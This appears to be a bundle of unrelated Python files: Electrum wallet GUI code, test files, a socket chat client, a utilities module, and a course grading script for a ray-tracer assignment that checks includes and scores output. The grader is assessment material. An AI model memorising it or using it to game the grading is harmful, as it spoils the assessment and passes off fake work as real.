msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
if action:
# self.wallet is set in run
self.run(action)
return self.wallet
self.wallet = Wallet(self.storage)
return self.wallet
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(filename))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, title=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False):
return self.text_input(title, message, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(None, msg, kind, self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(None, MSG_HW_STORAGE_ENCRYPTION, PW_NEW, self.next_button)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
def show_restore(self, wallet, network):
# FIXME: these messages are shown after the install wizard is
# finished and the window closed. On macOS they appear parented
# with a re-appeared ghost install wizard window...
if network:
def task():
wallet.wait_until_synchronized()
if wallet.is_found():
msg = _("Recovery successful")
else:
msg = _("No transactions found for this seed")
self.synchronized_signal.emit(msg)
self.synchronized_signal.connect(self.show_message)
t = threading.Thread(target = task)
t.daemon = True
t.start()
else:
msg = _("This wallet was restored offline. It may "
"contain more addresses than displayed.")
self.show_message(msg)
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self):
self.accept_signal.emit()
def waiting_dialog(self, task, msg):
self.please_wait.setText(msg)
self.refresh_gui()
t = threading.Thread(target = task)
t.start()
t.join()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=()):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMaximumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return ' '.join(line.text().split())
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("ElectrumG communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
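# Hedged illustration of the wizard_dialog pattern above (method name and
# callback are hypothetical): the decorated dialog method simply returns its
# result, and the wrapper forwards it to the run_next callback, wrapping single
# values into a 1-tuple and swallowing GoBack/UserCancelled.
#
#   @wizard_dialog
#   def pick_number_dialog(self, run_next):
#       return 42
#
#   wizard.pick_number_dialog(run_next=handler)   # ends up calling handler(42)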
|
grading-script.py
|
#!/usr/bin/python
# ./grading-script.py <test-dir>
import os,re,sys,shutil,random,subprocess,threading
test_dir = 'tests'
if len(sys.argv) > 1:
test_dir=sys.argv[1]
# Set up scratch space for grading
dir="grading"
try:
shutil.rmtree(dir)
except:
pass
os.mkdir(dir)
os.mkdir(dir + '/src')
re_cp=re.compile('\.h$|\.cpp$|^Makefile$')
for f in os.listdir('.'):
if re_cp.search(f):
shutil.copyfile(f, dir+"/"+f)
for f in os.listdir('src'):
if re_cp.search(f):
shutil.copyfile('src/' + f, dir+"/src/"+f)
# Check for cheating
token='TOKEN'+str(random.randrange(100000,999999))
header_cmd=['g++','-Wall','-g','-O3','-std=c++11','-M' ,'-DNO_OPENGL']
re_header=re.compile('[\\\\ :\n]+')
ok_h={'':1}
header_base=subprocess.check_output(header_cmd+['src/header-check.cpp']);
for h in re_header.split(header_base):
ok_h[h]=1
for src_file in [
'camera',
'dump_png',
'flat_shader',
'main',
'parse',
'phong_shader',
'plane',
'reflective_shader',
'render_world',
'sphere']:
ok_h['src/' + src_file + '.cpp']=1
ok_h[src_file + '.o']=1
header_mini=subprocess.check_output(header_cmd+['src/' + src_file + '.cpp']);
for h in re_header.split(header_mini):
if not ok_h.has_key(h):
print("FAIL: forbidden include: "+h)
exit()
if subprocess.call(['make','ray_tracer'],cwd=dir)!=0:
print("FAIL: Did not compile")
exit()
def run_command_with_timeout(cmd, timeout_sec):
proc = subprocess.Popen(cmd,cwd=dir)
proc_thread = threading.Thread(target=proc.communicate)
proc_thread.start()
proc_thread.join(timeout_sec)
if proc_thread.is_alive():
try:
proc.kill()
except OSError, e:
return True
return False
return True
hashed_tests={}
total_score=0
ignore_line=re.compile('^\s*(#|$)')
grade_line=re.compile('^(\S+)\s+(\S+)\s+(\S+)\s*$')
gs=0
try:
gs=open('grading-scheme.txt')
except:
print("FAIL: could not open grading scheme.")
exit()
diff_parse=re.compile('diff: (.*)')
time_parse=re.compile('time: (.*)')
grade_cmd=['./ray_tracer', '-i', 'file.txt', '-s', 'file.png', '-o', token+'.txt']
for line in gs.readlines():
if ignore_line.search(line):
continue
g=grade_line.search(line)
if not g:
print("Unrecognized command: "+line)
exit()
points=float(g.groups()[0])
max_error=float(g.groups()[1])
max_time=15000
file=g.groups()[2]
pass_error = 0
pass_time = 0
if not hashed_tests.has_key(file):
timeout = max(int(max_time*1.2*3/1000)+1,2)
shutil.copyfile(test_dir+'/'+file+".txt", dir+"/file.txt")
shutil.copyfile(test_dir+'/'+file+".png", dir+"/file.png")
if not run_command_with_timeout(grade_cmd, timeout):
hashed_tests[file]="TIMEOUT"
else:
d=False
try:
results_file=open(dir+'/'+token+'.txt')
d=diff_parse.match(results_file.readline())
results_file.close()
os.remove(dir+'/'+token+'.txt')
if d: d=float(d.groups()[0])
except IOError:
# print 'Test failed'
d="CRASH"
hashed_tests[file]=d
d=hashed_tests[file]
if d=="CRASH":
print("FAIL: (%s) Program crashed."%file)
points=0
elif d=="TIMEOUT":
print("FAIL: (%s) Test timed out."%file)
points=0
elif d==None:
print("FAIL: (%s) Program failed to report statistics."%file)
points=0
else:
if d>max_error:
print("FAIL: (%s) Too much error. Actual: %g Max: %g."%(file,d,max_error))
points=0
else:
print("PASS: (%s) diff %g vs %g."%(file,d,max_error))
if points>0:
print("+%g points"%points)
total_score+=points
else:
print("no points")
print("FINAL SCORE: %g"%total_score)
|
test_timeoutqueue.py
|
# Copyright (c) 2001-2004 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Test cases for timeoutqueue module.
"""
import time
from twisted.trial import unittest
from twisted.python import timeoutqueue
from twisted.internet import reactor, interfaces
class TimeoutQueueTest(unittest.TestCase):
def setUp(self):
self.q = timeoutqueue.TimeoutQueue()
def tearDown(self):
del self.q
def put(self):
time.sleep(1)
self.q.put(1)
def testTimeout(self):
q = self.q
try:
q.wait(1)
except timeoutqueue.TimedOut:
pass
else:
raise AssertionError, "didn't time out"
def testGet(self):
q = self.q
start = time.time()
threading.Thread(target=self.put).start()
q.wait(1.5)
assert time.time() - start < 2
result = q.get(0)
if result != 1:
raise AssertionError, "didn't get item we put in"
if interfaces.IReactorThreads(reactor, None) is None:
testGet.skip = "No thread support, no way to test putting during a blocked get"
else:
global threading
import threading
|
py_chat.py
|
# -*- coding: utf-8 -*-
""" py_chat.py - Main class for a simple chat program"""
__author__ = "topseli"
__credits__ = ["Deepak Sritvatsav"]
__license__ = "0BSD"
import sys
import os
import socket
import threading
import base64
import logging
from PyQt5 import QtWidgets, uic
import login_view
import chat_view
class PyChat(QtWidgets.QWidget):
def __init__(self):
super(PyChat, self).__init__()
self.init_ui()
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.thread = threading.Thread(target=self.server_listener, args=(1,), daemon=True)
logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.DEBUG)
def init_ui(self):
path = os.path.dirname(os.path.abspath(__file__)) + '/main_window.ui'
uic.loadUi(path, self)
# Create QWidget instances
self.login_widget = login_view.LoginView()
self.chat_widget = chat_view.ChatView()
# Add QWidget instances to stackedWidget
self.stacked_widget.addWidget(self.login_widget)
self.stacked_widget.addWidget(self.chat_widget)
# Connect exit_buttons
self.login_widget.exit_button.clicked.connect(
self.on_exit_button_clicked)
self.chat_widget.exit_button.clicked.connect(
self.on_exit_button_clicked)
# Connect signals
self.login_widget.login_signal.connect(
self.on_login_clicked)
self.chat_widget.send_signal.connect(
self.on_send_clicked)
def to_base64(self, message):
return base64.encodebytes(message.encode("utf-8"))
def rcv_base64(self, message):
return base64.decodebytes(message).decode("utf-8")
def server_listener(self, id):
while True:
message = self.rcv_base64(self.server.recv(2048))
if message:
self.chat_widget.chat_display.append(message)
def start_chat_thread(self):
self.thread.start()
def on_exit_button_clicked(self):
sys.exit(0)
def on_login_clicked(self, login_info):
try:
self.server.connect((login_info["address"], login_info["port"]))
self.server.sendall(self.to_base64(login_info["username"]))
except ConnectionRefusedError as e:
self.login_widget.show_warning(e)
return
self.stacked_widget.setCurrentWidget(self.chat_widget)
self.start_chat_thread()
def on_send_clicked(self, message):
self.server.sendall(self.to_base64(message))
def run():
APP = QtWidgets.QApplication(sys.argv)
APP_WINDOW = PyChat()
APP_WINDOW.show()
APP.exec_()
if __name__ == '__main__':
run()
|
test_lockable.py
|
#!/usr/bin/env python
__author__ = "Radical.Utils Development Team (Andre Merzky)"
__copyright__ = "Copyright 2013, RADICAL@Rutgers"
__license__ = "MIT"
import time
import threading as mt
import radical.utils as ru
# ------------------------------------------------------------------------------
#
def test_lockable():
'''
Test lockable decorator
'''
# --------------------------------------------------------------------------
@ru.Lockable
class Test(object):
# ----------------------------------------------------------------------
def __init__(self):
self.val = False
# ----------------------------------------------------------------------
def test(self):
self.lock() # lock before spawning thread
thread_1 = mt.Thread(target=self.test_1)
thread_1.start() # thread will run until lock check
time.sleep(0.1) # enough time to trigger lock violation
self.val = False # set a bogus value
self.unlock() # only now thread can set True
thread_1.join() # make sure the value was set
assert(self.val) # make sure the value was set correctly
self.lock() # lock before spawning thread
thread_2 = mt.Thread(target=self.test_2)
thread_2.start() # thread will run until lock check
time.sleep(0.1) # enough time to trigger lock violation
self.val = False # set a bogus value
self.unlock() # only now thread can set True
thread_2.join() # make sure the value was set
assert(self.val) # make sure the value was set correctly
# ----------------------------------------------------------------------
def test_1(self):
with self:
self.val = True
# ----------------------------------------------------------------------
def test_2(self):
self.lock()
self.val = True
self.unlock()
# --------------------------------------------------------------------------
t = Test()
# check lock with resource manager
with t:
pass
# check explicit and recursive lock/unlock
t.lock (); assert( t.locked()) # noqa
t.unlock(); assert(not t.locked()) # noqa
t.lock (); assert( t.locked()) # noqa
t.lock (); assert( t.locked()) # noqa
t.unlock(); assert( t.locked()) # noqa
t.unlock(); assert(not t.locked()) # noqa
# check locking over threads
t.test()
# check double unlock
try : t.unlock(); assert(not t.locked()) # noqa
except RuntimeError : pass
except Exception as e: assert(False), "RuntimeError != %s" % type(e)
else : assert(False), "expected RuntimeError, got none"
# ------------------------------------------------------------------------------
# run tests if called directly
if __name__ == "__main__":
test_lockable()
# ------------------------------------------------------------------------------
|
utils.py
|
#!/usr/bin/env python3
###############################################################################
# Module Imports
###############################################################################
import logging
import re
import time
import threading
import signal
import functools
import inspect
###############################################################################
# Decorators
###############################################################################
###############################################################################
# Decorator decorator is a simplified version of the code from the funcy lib.
# https://github.com/Suor/funcy
###############################################################################
class Call:
def __init__(self, func, args, kwargs):
self.func, self.args, self.kwargs = func, args, kwargs
def __call__(self):
return self.func(*self.args, **self.kwargs)
def decorator(deco):
    spec = inspect.getfullargspec(deco)
    if len(spec.args) > 1 or spec.varargs or spec.varkw:
@functools.wraps(deco)
def _fab(*dargs, **dkwargs):
return make_decorator(deco, *dargs, **dkwargs)
return _fab
else:
return functools.wraps(deco)(make_decorator(deco))
def make_decorator(deco, *dargs, **dkwargs):
def _decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
call = Call(func, args, kwargs)
return deco(call, *dargs, **dkwargs)
return wrapper
return _decorator
###############################################################################
@decorator
def listify(call, wrapper=list):
return wrapper(call())
@decorator
def morph(call, catch_exc, raise_exc):
try:
return call()
except catch_exc as error:
raise raise_exc(error) from error
@decorator
def ignore(call, error=Exception, value=None):
try:
return call()
except error:
return value
@decorator
def log_errors(call, logger=print):
try:
return call()
except Exception as error:
logger(error)
        raise  # re-raise with the original traceback after logging
@decorator
def decochain(call, *decs):
fn = call.func
for dec in reversed(decs):
fn = dec(fn)
return fn(*call.args, **call.kwargs)
class cached_property:
def __init__(self, func):
self.func = func
functools.update_wrapper(self, func)
def __get__(self, obj, cls):
if not hasattr(obj, "_cache"):
obj._cache = {}
if self.func.__name__ not in obj._cache:
obj._cache[self.func.__name__] = self.func(obj)
return obj._cache[self.func.__name__]
###############################################################################
def split(text, delimiters):
    pattern = "|".join(map(re.escape, delimiters))
return re.split(pattern, text)
class ProgressBar:
def __init__(self, title, max_value):
self.title = title
self.max_value = max_value
self.value = 0
signal.signal(signal.SIGINT, self.exit)
def start(self):
self.finished = False
self.time_started = time.time()
threading.Thread(target=self.run).start()
def update(self):
print(self.line() + "\r", end="")
def line(self):
filled = 40 * self.value / self.max_value
parts = " ▏▎▍▌▋▊▉"
current = int(filled * len(parts)) % len(parts)
bar = "█" * int(filled) + parts[current] + " " * 40
tm = time.gmtime(time.time() - self.time_started)
return "{} |{}| {:>3}% ({}:{:02}:{:02}) ".format(
self.title,
bar[:40],
100 * self.value // self.max_value,
tm.tm_hour,
tm.tm_min,
tm.tm_sec,
)
def run(self):
while not self.finished:
self.update()
time.sleep(1)
def stop(self):
self.finished = True
print(self.line())
def exit(self, signum, frame):
self.stop()
raise KeyboardInterrupt
def pbar(it, title=None, max=None):
max = len(it) if max is None else max
title = "" if title is None else title + " "
bar = ProgressBar(title, max)
bar.start()
for i in it:
yield i
bar.value += 1
bar.update()
bar.stop()
###############################################################################
class LogCount:
def __init__(self):
self.count = 1
def filter(self, record):
record.count = self.count
self.count += 1
return True
def log_sql_debug():
logger = logging.getLogger("peewee")
logger.setLevel(logging.DEBUG)
logger.addFilter(LogCount())
term = logging.StreamHandler()
term.setFormatter(logging.Formatter("{count} {message}", style="{"))
logger.addHandler(term)
def default_logging(debug=False):
term = logging.StreamHandler()
file = logging.FileHandler("pyscp.log", mode="a", delay=True)
if debug:
term.setLevel(logging.DEBUG)
file.setLevel(logging.DEBUG)
else:
term.setLevel(logging.INFO)
file.setLevel(logging.INFO)
term.setFormatter(logging.Formatter("{message}", style="{"))
file.setFormatter(
logging.Formatter("{asctime} {levelname:8s} {message}", style="{")
)
logger = logging.getLogger("pyscp")
logger.setLevel(logging.DEBUG)
logger.addHandler(term)
logger.addHandler(file)
###############################################################################
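# A minimal, self-contained usage sketch of the helpers above, run only when
# the module is executed directly. The names used here (squares, to_int,
# Circle) are illustrative only and are not part of the module's interface.
if __name__ == "__main__":
    @listify()  # collect the generator returned by the function into a list
    def squares(n):
        return (i * i for i in range(n))

    @ignore(ValueError, value=None)  # swallow ValueError and return None
    def to_int(text):
        return int(text)

    class Circle:
        def __init__(self, r):
            self.r = r

        @cached_property  # computed on first access, then served from _cache
        def area(self):
            return 3.14159 * self.r ** 2

    assert squares(4) == [0, 1, 4, 9]
    assert to_int("12") == 12 and to_int("oops") is None
    assert split("a,b;c d", ",; ") == ["a", "b", "c", "d"]
    circle = Circle(2)
    assert circle.area == circle.area  # second access hits the cache
    for _ in pbar(range(3), title="demo"):  # draw a short progress bar
        time.sleep(0.2)
###############################################################################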
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING, Sequence, List, Union
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog)
import electrum_ltc as electrum
from electrum_ltc import (keystore, ecc, constants, util, bitcoin, commands,
paymentrequest)
from electrum_ltc.bitcoin import COIN, is_address
from electrum_ltc.plugin import run_hook
from electrum_ltc.i18n import _
from electrum_ltc.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain,
UserCancelled, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
decimal_point_to_base_unit_name,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, maybe_extract_bolt11_invoice, NotEnoughFunds,
NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs)
from electrum_ltc.util import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING
from electrum_ltc.transaction import (Transaction, PartialTxInput,
PartialTransaction, PartialTxOutput)
from electrum_ltc.address_synchronizer import AddTransactionException
from electrum_ltc.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum_ltc.version import ELECTRUM_VERSION
from electrum_ltc.network import Network, TxBroadcastError, BestEffortRequestFailed, UntrustedServerReturnedError
from electrum_ltc.exchange_rate import FxThread
from electrum_ltc.simple_config import SimpleConfig
from electrum_ltc.logging import Logger
from electrum_ltc.util import PR_PAID, PR_FAILED
from electrum_ltc.util import pr_expiration_values
from electrum_ltc.lnutil import ln_dummy_address
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT)
from .util import ButtonsTextEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
from .confirm_tx_dialog import ConfirmTxDialog
from .transaction_dialog import PreviewTxDialog
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
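# Usage note: methods decorated with @protected receive the wallet password via
# the `password` keyword argument supplied by the wrapper above; callers invoke
# them without it. See, for example, `protect()` and `sign_tx()` defined on
# ElectrumWindow further below.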
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.pluginsdialog = None
self.tl_windows = []
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
coincontrol_sb = self.create_coincontrol_statusbar()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.channels_tab = self.create_channels_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
if self.wallet.has_lightning():
add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
central_widget = QWidget()
vbox = QVBoxLayout(central_widget)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(tabs)
vbox.addWidget(coincontrol_sb)
self.setCentralWidget(central_widget)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum-ltc.png"))
self.init_menubar()
